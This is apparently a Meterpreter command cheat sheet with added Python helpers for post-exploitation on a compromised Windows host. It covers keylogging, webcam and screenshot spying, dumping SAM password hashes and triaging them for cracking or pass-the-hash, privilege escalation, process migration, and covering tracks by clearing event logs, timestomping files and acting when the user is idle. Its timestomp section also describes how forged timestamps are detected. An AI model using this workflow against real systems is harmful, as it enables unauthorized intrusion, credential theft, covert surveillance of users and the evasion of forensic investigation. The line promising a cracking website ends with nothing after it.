Meterpreter Commands

sessions -l  lists the sessions (compromised hosts) you currently control.
You will see something like:

Id Description Tunnel

4  meterpreter x86/win32  server-PC\Administrator @ SERVER-PC  192.168.195.140:4444 -> 192.168.195.1:52540 (192.168.195.1)

Note the Id at the start of the line.
To take control of a host, enter its Id. Both sessions commands are typed at the msfconsole prompt, not inside Meterpreter:
msf > sessions -i 4
In this example the Id is 4; after the command the prompt changes to meterpreter >.
meterpreter > sysinfo
Shows information about the target system (computer name, OS version, architecture, domain, logged-on users).
meterpreter > background
Leaves the target session in the background and returns to the Metasploit prompt. The session stays alive and can be re-entered with sessions -i.
meterpreter > ps
Lists the processes running on the target (PID, PPID, name, architecture, session, user, path).
meterpreter > keyscan_start
Starts logging the target's keystrokes; keyscan_stop ends the logging. Only the desktop of the process Meterpreter lives in is captured, so migrate into a process on the user's interactive desktop first (typically explorer.exe), or into winlogon.exe if you want to capture logon passwords.
meterpreter > keyscan_dump
Prints the keystrokes captured so far.
meterpreter > migrate (PID)
Moves Meterpreter into another process.
Run ps first to find a suitable process, then migrate (PID). Pick a long-lived process that runs as the same user (or as SYSTEM, if you already are) and, where possible, has the same architecture as your payload. Migrating out of the original exploited process is usually the first thing to do, so the session survives that process exiting.
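Choosing the migration target from ps output is the step most often done by eye. The following helper is an added example (it is not part of the original page and not Metasploit code): it parses pasted ps output and applies the rules above, namely same user as getuid, same architecture as the payload, same logon session as the current process, and a preference for a long-lived desktop owner such as explorer.exe. The sample ps table is constructed, not captured from a real target.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# One row of Meterpreter's `ps` table. Columns are separated by runs of at
# least two spaces; Arch/Session/User/Path are absent for kernel
# pseudo-processes such as "[System Process]", so those groups are optional.
PS_ROW = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>\S.*?)"
    r"(?:\s{2,}(?P<arch>x86|x64)\s+(?P<session>\d+)"
    r"(?:\s{2,}(?P<user>\S.*?)(?:\s{2,}(?P<path>\S.*?))?)?)?\s*$"
)


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    arch: Optional[str]
    session: Optional[int]
    user: Optional[str]
    path: Optional[str]


def parse_ps(text: str) -> List[Proc]:
    """Parse pasted `ps` output; header, separator and blank lines are skipped."""
    procs = []
    for line in text.splitlines():
        m = PS_ROW.match(line)
        if not m:
            continue
        procs.append(Proc(
            pid=int(m["pid"]),
            ppid=int(m["ppid"]),
            name=m["name"],
            arch=m["arch"],
            session=int(m["session"]) if m["session"] is not None else None,
            user=m["user"],
            path=m["path"],
        ))
    return procs


def choose_migration_target(procs: List[Proc], self_pid: int, user: str, arch: str,
                            preferred=("explorer.exe",)) -> Optional[int]:
    """Pick a PID to `migrate` into, or None if nothing suitable is listed.

    A candidate must be another process, run as the same user as us (getuid),
    have the same architecture as our payload, and live in the same logon
    session as our current process (moving across sessions changes which
    desktop keyscan_* and screenshot see). Long-lived desktop owners listed
    in `preferred` win; otherwise the first remaining candidate is returned.
    """
    me = next((p for p in procs if p.pid == self_pid), None)
    candidates = [
        p for p in procs
        if p.pid != self_pid and p.user == user and p.arch == arch
        and (me is None or p.session == me.session)
    ]
    for name in preferred:
        for p in candidates:
            if p.name.lower() == name:
                return p.pid
    return candidates[0].pid if candidates else None


# Constructed sample in the layout `ps` prints (not output from a real target).
SAMPLE_PS = r"""
 PID   PPID  Name               Arch  Session  User                     Path
 ---   ----  ----               ----  -------  ----                     ----
 0     0     [System Process]
 4     0     System             x64   0
 384   4     smss.exe           x64   0        NT AUTHORITY\SYSTEM      \SystemRoot\System32\smss.exe
 620   504   winlogon.exe       x64   1        NT AUTHORITY\SYSTEM      C:\Windows\system32\winlogon.exe
 1296  1204  explorer.exe       x64   1        SERVER-PC\Administrator  C:\Windows\Explorer.EXE
 2210  1296  notepad.exe        x64   1        SERVER-PC\Administrator  C:\Windows\system32\notepad.exe
 2480  1296  wordpad.exe        x86   1        SERVER-PC\Administrator  C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe
 3172  1296  payload.exe        x86   1        SERVER-PC\Administrator  C:\Users\Administrator\Desktop\payload.exe
"""

if __name__ == "__main__":
    procs = parse_ps(SAMPLE_PS)
    # payload.exe (PID 3172) is our x86 session running as Administrator.
    print(choose_migration_target(procs, 3172, r"SERVER-PC\Administrator", "x86"))  # 2480 (wordpad.exe)
    print(choose_migration_target(procs, 3172, r"SERVER-PC\Administrator", "x64"))  # 1296 (explorer.exe)
    # After a successful getsystem, winlogon.exe in the same session becomes reachable.
    print(choose_migration_target(procs, 3172, r"NT AUTHORITY\SYSTEM", "x64"))  # 620 (winlogon.exe)
```

The architecture filter is deliberately strict; Metasploit can migrate between x86 and x64 processes, but keeping the same architecture avoids surprises, so relax the filter only when no same-arch candidate exists.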
meterpreter > ipconfig
Shows the target's network interfaces and addresses.
meterpreter > getuid
Shows the user account the Meterpreter server is running as (check it after getsystem or migrate).
meterpreter > shell
Drops into a command prompt (cmd.exe) on the target; type exit to return to Meterpreter.
meterpreter > idletime
Shows how long the target's user has been idle, in seconds, which helps judge when a screenshot or other noisy action is less likely to be noticed.
meterpreter > hashdump
Dumps the password hashes from the target's SAM database, one line per account in the form user:RID:LM-hash:NT-hash:::. It needs SYSTEM privileges, so run getsystem first. A recommended hash-cracking website:
meterpreter > getsystem
Tries several built-in techniques (named-pipe impersonation, token duplication) to elevate automatically to NT AUTHORITY\SYSTEM. All of them need an already privileged context (a local administrator not restricted by UAC, or a service account), so confirm the result with getuid.
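What to do with the hashdump output described above is usually decided before any cracking starts. The following helper is an added example (it is not part of the original page and not Metasploit code): it parses pwdump-style hashdump lines, flags accounts with a blank password, accounts that still store an LM hash, accounts that share one NT hash, and the built-in Administrator (RID 500), and emits the hashes in the formats hashcat (-m 1000) and John the Ripper (--format=NT) read. The sample lines are constructed, not dumped from a real target.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List

# Well-known sentinel values in pwdump-style output.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": LM storage disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "": the password is blank
HEX32 = re.compile(r"[0-9a-f]{32}")


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str


def parse_hashdump(text: str) -> List[Account]:
    """Parse `hashdump` lines (user:RID:LM:NT:::); other console output is ignored."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("["):
            continue
        parts = line.split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if not (HEX32.fullmatch(lm) and HEX32.fullmatch(nt)):
            continue
        accounts.append(Account(parts[0], int(parts[1]), lm, nt))
    return accounts


def triage(accounts: List[Account]) -> Dict[str, object]:
    """Point out what is worth attacking first, before any cracking is attempted."""
    by_nt: Dict[str, List[str]] = defaultdict(list)
    for a in accounts:
        by_nt[a.nt].append(a.user)
    return {
        # Usable immediately: the password is empty.
        "blank_password": [a.user for a in accounts if a.nt == EMPTY_NT],
        # LM hashes are case-insensitive 7-character halves and fall in minutes.
        "lm_hash_present": [a.user for a in accounts if a.lm != EMPTY_LM],
        # One cracked (or passed) hash opens every account that shares it.
        "shared_nt_hash": {h: u for h, u in by_nt.items() if len(u) > 1 and h != EMPTY_NT},
        # RID 500 is the built-in Administrator, whatever it has been renamed to.
        "builtin_admin": [a.user for a in accounts if a.rid == 500],
    }


def hashcat_nt_lines(accounts: List[Account]) -> List[str]:
    """Unique NT hashes for `hashcat -m 1000`; blank passwords need no cracking."""
    return sorted({a.nt for a in accounts if a.nt != EMPTY_NT})


def john_pwdump_lines(accounts: List[Account]) -> List[str]:
    """Rows in the pwdump format John the Ripper reads with --format=NT or --format=LM."""
    return [f"{a.user}:{a.rid}:{a.lm}:{a.nt}:::" for a in accounts]


# Constructed sample (not hashes from a real target).
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
jzking121:1000:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
legacy:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""

if __name__ == "__main__":
    accts = parse_hashdump(SAMPLE_HASHDUMP)
    for key, value in triage(accts).items():
        print(f"{key}: {value}")
    print("\n".join(hashcat_nt_lines(accts)))
```

Note that an NT hash does not have to be cracked to be useful: the same value can be replayed with pass-the-hash tooling, which is why the shared-hash check matters even when cracking fails.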
meterpreter > clearev
Clears the Application, System and Security event logs on the target. Clearing the Security log is itself recorded (event ID 1102 on Vista and later, 517 on XP/2003), and an empty log is a well-known indicator that defenders look for.
meterpreter > execute -f (Windows program)
Runs the given program on the target, for example execute -f cmd.exe -i -H for a hidden, interactive command prompt. The full option list:
meterpreter > execute 
Usage: execute -f file [options] 

Executes a command on the remote machine. 

OPTIONS: 

    -H        Create the process hidden from view. 
    -a <opt>  The arguments to pass to the command. 
    -c        Channelized I/O (required for interaction). 
    -d <opt>  The 'dummy' executable to launch when using -m. 
    -f <opt>  The executable command to run. 
    -h        Help menu. 
    -i        Interact with the process after creating it. 
    -k        Execute process on the meterpreters current desktop 
    -m        Execute from memory. 
    -s <opt>  Execute process in a given session as the session user 
    -t        Execute process with currently impersonated thread token 

meterpreter > timestomp
Modifies a file's time attributes (MACE: Modified, Accessed, Created, Entry modified). Dates are given as "MM/DD/YYYY HH24:MI:SS"; timestomp (file) -v shows the current values.
meterpreter > timestomp c:\\jzking121.txt -c "09/09/1980 12:12:34"   set the file's creation time
meterpreter > timestomp c:\\jzking121.txt -m "01/01/1991 12:12:34"  set the file's modification time
meterpreter > timestomp c:\\jzking121.txt -f c:\\RHDSetup.log  copy the MACE attributes of RHDSetup.log onto jzking121.txt
Be aware that timestomp only rewrites the $STANDARD_INFORMATION timestamps; the $FILE_NAME timestamps in the file's NTFS MFT record keep their original values, so forensic tools that compare the two can still spot the change.
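To see what the -m example above does to a file, and how it is spotted afterwards, here is an added example (not part of the original page and not Metasploit code). It sets a scratch file's modification time with the same "MM/DD/YYYY HH24:MI:SS" date format timestomp takes, then checks the two indicators a responder would look at first: a timestamp that sits on an exact second (timestomp's input format has no sub-second part, so the forged value lands on .000000000, while real writes on NTFS, ext4 or APFS almost never do), and a modification time older than the earliest date that makes sense for the host. Only M and A times are set here, because os.utime cannot set creation times; the host's earliest plausible date is an assumed value.

```python
import os
import tempfile
import time
from datetime import datetime
from typing import List, Optional, Tuple

# timestomp takes dates as "MM/DD/YYYY HH24:MI:SS".
TIMESTOMP_FMT = "%m/%d/%Y %H:%M:%S"


def parse_timestomp_date(when: str) -> float:
    """Turn a timestomp-style date into a local-time POSIX timestamp (whole seconds)."""
    return time.mktime(datetime.strptime(when, TIMESTOMP_FMT).timetuple())


def stomp_mtime(path: str, when: str) -> float:
    """Rewrite the file's modified and accessed times, as `timestomp -m` / `-a` do.

    os.utime only reaches M and A portably; creation time needs the SetFileTime
    call timestomp itself makes on Windows, so it is out of scope here.
    """
    ts = parse_timestomp_date(when)
    os.utime(path, (ts, ts))
    return ts


def stomp_indicators(path: str, earliest_plausible: Optional[str] = None) -> List[str]:
    """Return the reasons a file's mtime looks forged; an empty list means nothing odd.

    * Zero sub-second component: the forged value came from a whole-second
      string. Useless on FAT or other coarse-granularity filesystems, where
      every timestamp is rounded anyway.
    * Older than `earliest_plausible` (assumed: OS install date, first
      deployment, ...): nothing on the host can genuinely predate it.
    """
    st = os.stat(path)
    reasons = []
    if st.st_mtime_ns % 1_000_000_000 == 0:
        reasons.append("mtime has a zero sub-second component")
    if earliest_plausible is not None and st.st_mtime < parse_timestomp_date(earliest_plausible):
        reasons.append(f"mtime predates {earliest_plausible}")
    return reasons


def demo(earliest_plausible: str = "07/01/2009 00:00:00") -> Tuple[List[str], List[str]]:
    """Create a scratch file, forge its mtime like the page's -m example, inspect it before and after."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("constructed sample file\n")
        path = fh.name
    try:
        # Give the file a realistic, non-forged timestamp: now, with a sub-second part.
        genuine_ns = int(time.time()) * 1_000_000_000 + 123_456_789
        os.utime(path, ns=(genuine_ns, genuine_ns))
        before = stomp_indicators(path, earliest_plausible)
        stomp_mtime(path, "01/01/1991 12:12:34")
        after = stomp_indicators(path, earliest_plausible)
        return before, after
    finally:
        os.unlink(path)


if __name__ == "__main__":
    before, after = demo()
    print("before:", before)  # []
    print("after: ", after)   # ['mtime has a zero sub-second component', 'mtime predates 07/01/2009 00:00:00']
```

The -f form of timestomp (copy the MACE values from another file) defeats the first check, since the copied values carry the source file's sub-second part; that is why the $FILE_NAME comparison mentioned above remains the more reliable test on NTFS.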
meterpreter > download (file path)
Downloads a file from the target into the local working directory (see lpwd).
For example, to download jzking121.txt from the root of drive C:
meterpreter > download c:\\jzking121.txt
[*] downloading: c:\jzking121.txt -> jzking121.txt
[*] downloaded : c:\jzking121.txt -> jzking121.txt
Note that each backslash in the path must be doubled (\\), because a single backslash is treated as an escape character by the Meterpreter console.
The upload command works the same way in the other direction: upload (local file) (remote path).
meterpreter > shutdown
Shuts the target computer down, which also ends your session; reboot restarts it.
meterpreter > screenshot
Takes a screenshot of the target's interactive desktop and saves it locally.
meterpreter > uictl enable keyboard   re-enable the target's keyboard
meterpreter > uictl disable mouse     disable the target's mouse
enable turns a component (keyboard or mouse) on, disable turns it off. The user notices a dead keyboard or mouse immediately, so use this with care.
meterpreter > webcam_list
Lists the webcams attached to the target.
meterpreter > webcam_snap
Takes a picture with the specified webcam (-i index, default 1) and saves it locally.
meterpreter > search -d c:\\ -f 1.jpg
Searches drive C: of the target for files named 1.jpg (-d directory to search, -f file name pattern; wildcards such as *.docx work).



meterpreter > help 

Core Commands 
============= 

    Command                   Description 
    -------                   ----------- 
    ?                         Help menu 
    background                Backgrounds the current session 
    bgkill                    Kills a background meterpreter script 
    bglist                    Lists running background scripts 
    bgrun                     Executes a meterpreter script as a background thread 
    channel                   Displays information about active channels 
    close                     Closes a channel 
    disable_unicode_encoding  Disables encoding of unicode strings 
    enable_unicode_encoding   Enables encoding of unicode strings 
    exit                      Terminate the meterpreter session 
    help                      Help menu 
    info                      Displays information about a Post module 
    interact                  Interacts with a channel 
    irb                       Drop into irb scripting mode 
    load                      Load one or more meterpreter extensions 
    migrate                   Migrate the server to another process 
    quit                      Terminate the meterpreter session 
    read                      Reads data from a channel 
    resource                  Run the commands stored in a file 
    run                       Executes a meterpreter script or Post module 
    use                       Deprecated alias for 'load' 
    write                     Writes data to a channel 


Stdapi: File system Commands 
============================ 

    Command       Description 
    -------       ----------- 
    cat           Read the contents of a file to the screen 
    cd            Change directory 
    download      Download a file or directory 
    edit          Edit a file 
    getlwd        Print local working directory 
    getwd         Print working directory 
    lcd           Change local working directory 
    lpwd          Print local working directory 
    ls            List files 
    mkdir         Make directory 
    pwd           Print working directory 
    rm            Delete the specified file 
    rmdir         Remove directory 
    search        Search for files 
    upload        Upload a file or directory 


Stdapi: Networking Commands 
=========================== 

    Command       Description 
    -------       ----------- 
    ifconfig      Display interfaces 
    ipconfig      Display interfaces 
    portfwd       Forward a local port to a remote service 
    route         View and modify the routing table 


Stdapi: System Commands 
======================= 

    Command       Description 
    -------       ----------- 
    clearev       Clear the event log 
    drop_token    Relinquishes any active impersonation token. 
    execute       Execute a command 
    getpid        Get the current process identifier 
    getprivs      Attempt to enable all privileges available to the current process 
    getuid        Get the user that the server is running as 
    kill          Terminate a process 
    ps            List running processes 
    reboot        Reboots the remote computer 
    reg           Modify and interact with the remote registry 
    rev2self      Calls RevertToSelf() on the remote machine 
    shell         Drop into a system command shell 
    shutdown      Shuts down the remote computer 
    steal_token   Attempts to steal an impersonation token from the target process 
    sysinfo       Gets information about the remote system, such as OS 


Stdapi: User interface Commands 
=============================== 

    Command        Description 
    -------        ----------- 
    enumdesktops   List all accessible desktops and window stations 
    getdesktop     Get the current meterpreter desktop 
    idletime       Returns the number of seconds the remote user has been idle 
    keyscan_dump   Dump the keystroke buffer 
    keyscan_start  Start capturing keystrokes 
    keyscan_stop   Stop capturing keystrokes 
    screenshot     Grab a screenshot of the interactive desktop 
    setdesktop     Change the meterpreters current desktop 
    uictl          Control some of the user interface components 


Stdapi: Webcam Commands 
======================= 

    Command       Description 
    -------       ----------- 
    webcam_list   List webcams 
    webcam_snap   Take a snapshot from the specified webcam 


Priv: Elevate Commands 
====================== 

    Command       Description 
    -------       ----------- 
    getsystem     Attempt to elevate your privilege to that of local system. 


Priv: Password database Commands 
================================ 

    Command       Description 
    -------       ----------- 
    hashdump      Dumps the contents of the SAM database 


Priv: Timestomp Commands 
======================== 

    Command       Description 
    -------       ----------- 
    timestomp     Manipulate file MACE attributes